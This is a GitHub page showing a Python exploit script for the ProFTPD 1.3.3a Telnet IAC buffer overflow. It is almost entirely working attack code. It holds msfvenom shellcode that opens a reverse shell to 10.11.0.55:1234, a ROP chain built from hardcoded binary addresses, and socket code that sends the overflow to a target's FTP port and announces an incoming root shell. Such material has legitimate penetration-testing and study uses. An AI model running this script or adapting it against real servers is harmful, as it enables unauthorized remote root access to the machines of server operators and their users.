forked from Muhammd/ProFTPD-1.3.3a
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ProFTPD_exploit.py
105 lines (94 loc) · 4.22 KB
/
ProFTPD_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#!/usr/bin/python
##
##//#############################################################################################################
## ## #
## Vulnerability: ProFTPD IAC Remote Root Exploit ## Telnet IAC Buffer Overflow (Linux) #
## ## ProFTPD 1.3.2rc3 #
## Vulnerable Application: ProFTPD 1.3.3a ## This is a part of the Metasploit Module, #
## Tested on Linux 2.6.32-5-686 ## exploit/linux/ftp/proftp_telnet_iac #
## ## #
## Author: Muhammad Haidari ## Spawns a reverse shell to 10.11.0.55:1234 #
## Contact: ghmh@outlook.com ## #
## Website: www.github.com/muhammd ## #
## ## #
##//#############################################################################################################
##
##
## TODO: adjust
##
## Usage: python ProFTPD_exploit.py <Remote IP Address>
import sys,os,socket
import struct
#msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.55 LPORT=1234 CMD=/bin/sh PrependChrootBreak=true --smallest -f python -v payload -b '\x09\x0a\x0b\x0c\x0d\x20\xff'
payload = ""
payload += "\x6a\x1d\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
payload += "\x13\x34\x38\x49\xe4\x83\xeb\xfc\xe2\xf4\x05\xf1"
payload += "\x78\x3f\x5e\x7e\x11\x29\xb4\x52\x74\x6d\xd7\x52"
payload += "\x6e\xbc\xf9\xb8\xc0\x3d\x6c\xf5\xc9\xd5\xf4\x68"
payload += "\x2f\x8c\x1a\x16\xc0\x07\x5e\x05\x10\x54\x38\xf5"
payload += "\xc9\x06\xce\x52\x74\x6d\xed\x60\x84\x64\x05\xe3"
payload += "\xbe\x07\x67\x7b\x1a\x8e\x36\xb1\xa8\x54\x52\xf5"
payload += "\xc9\x77\x6d\x88\x76\x29\xb4\x71\x30\x1d\x5c\x32"
payload += "\x42\xe4\x03\x50\x4b\xe4\x30\xea\xc0\x05\x84\x5e"
payload += "\x19\xb5\x67\x8b\x4a\x6d\xd5\xf5\xc9\xb6\x5c\x56"
payload += "\x66\x97\x5c\x50\x66\xcb\x56\x51\xc0\x07\x66\x6b"
payload += "\xc0\x05\x84\x33\x84\x64"
# NOTE: All addresses are from the proftpd binary
IACCount = 4096+16
Offset = 0x102c-4
Ret = "0x805a547" # pop esi / pop ebp / ret
Writable = "0x80e81a0" # .data
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
sys.exit()
rop = struct.pack("<L",0xcccccccc) # unused
rop += struct.pack("<L",0x805a544) # mov eax,esi / pop ebx / pop esi / pop ebp / ret
rop += struct.pack("<L",0xcccccccc) # becomes ebx
rop += struct.pack("<L",0xcccccccc) # becomes esi
rop += struct.pack("<L",0xcccccccc) # becomes ebp
# quadruple deref the res pointer :)
rop += struct.pack("<L",0x8068886) # mov eax,[eax] / ret
rop += struct.pack("<L",0x8068886) # mov eax,[eax] / ret
rop += struct.pack("<L",0x8068886) # mov eax,[eax] / ret
rop += struct.pack("<L",0x8068886) # mov eax,[eax] / ret
# skip the pool chunk header
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
# execute the data :)
rop += struct.pack("<L",0x0805c26c) # jmp eax
buf = ''
buf += 'SITE '
buf += payload
if len(buf) % 2 == 0:
buf += "B"
print "Buffer was aligned"
buf += "\xff" * (IACCount - len(payload))
buf +="\x90" * (Offset - len(buf))
addrs = struct.pack('<L',0x805a547) #Ret
addrs +=struct.pack('<L',0x80e81a0) #Writable
addrs +=rop
buf += addrs
buf += "\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 21))
s.recv(1024)
s.send(buf)
print "Payload Successfully Send...Check your Multi/Handler"
print "....Reverse shell is comming to you..."
data=s.recv(1024)
print data
s.close()